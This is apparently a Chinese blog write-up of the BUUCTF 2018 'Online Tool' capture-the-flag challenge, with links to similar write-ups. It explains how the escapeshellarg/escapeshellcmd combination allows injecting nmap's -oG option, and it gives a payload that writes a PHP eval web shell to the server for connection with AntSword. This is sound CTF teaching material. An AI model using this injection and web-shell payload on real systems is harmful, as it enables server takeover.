[BUUCTF 2018]Online Tool

于 2021-05-08 21:09:14 发布
阅读量95 收藏
点赞数
分类专栏: ctfWP 文章标签: php unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/116542893
版权
本文介绍了PHP中的超全局变量$_SERVER,并探讨了如何利用其进行命令注入,特别是通过nmap的-oG参数写入一句话木马。博主详细解释了攻击过程,包括构造payload,利用蚁剑连接并寻找flag。文章强调了安全防护的重要性。
摘要由CSDN通过智能技术生成

[BUUCTF 2018]Online Tool

在这里插入图片描述

$_SERVER是php中一个超全局变量,是包含了头信息、路径、脚本位置等信息的一个数组;
其实第一个if不用绕,没用。

整体看一下,先绕过一系列的东西,然后执行了nmap的命令,其中host是传入的参数,这里应该是注入点。
关于nmap
查了一下,nmap存在一个参数 -oG 可以写入一个文件。

nmap <?php phpinfo();?> -oG phpinfo.php; 这样

所以大体思路是绕过在这里插入图片描述

然后,用nmap的-oG命令写入一个一句话木马。
payload: ?host=’ <?php @eval($_POST["hack"]);?> -oG hack.php ’
然后 :
在这里插入图片描述

根据 sandbox的路径,用蚁剑连上,去根目录找flag就行了

在这里插入图片描述

buu是动态的flag,直接copy没有用

参考引用:
php超全局变量 $_SERVER: https://www.cnblogs.com/pawn-i/p/11328693.html
PHP escapeshellarg()+escapeshellcmd() 之殇: https://paper.seebug.org/164/

4pri1
关注
专栏目录
BUUCTF 2018 Online Tool
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
BUUCTF 2018 Online Tool(escapeshellarg和escapeshellcmd)
weixin_45577185的博客
07-24 207
答案博客 参考博客 百度来了一篇文章: https://paper.seebug.org/164/ 这两个函数按代码里那样的顺序使用,是会产生漏洞的,如果是反过来就不会。 escapeshellarg: escapeshellarg() 将给字符串增加一个 单引号 并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 命令执行函数,并且还是确保安全的。shell 命令执行函数包含 exec(), system() 执行运算符 (反引号)。 escapeshellcmd: e
[BUUCTF 2018]Online Tool -wp
freerats的博客
07-03 385
打开网页可以看到代码,进行代码审计 $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); 获取你的ip,然后进行加密,把MD5值输出,然后以这个值创建一个目录 尝试一下127.0.0.1 ,发现调用nmap对输入的ip进行扫描 $host = $_GET['host']; $ho.
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 4038
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
BUUCTF:[BUUCTF 2018]Online Tool
末初的CSDN博客
12-04 1517
https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $h
Office365与SharePoint Online开发指南
"SharePoint Online是微软提供的一款基于云端的企业协作平台,主要面向希望在云环境中构建、管理和协作的组织。本书详细介绍了如何使用SharePoint Online进行各种级别的定制和开发,涵盖了从基本的浏览器定制到高级...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值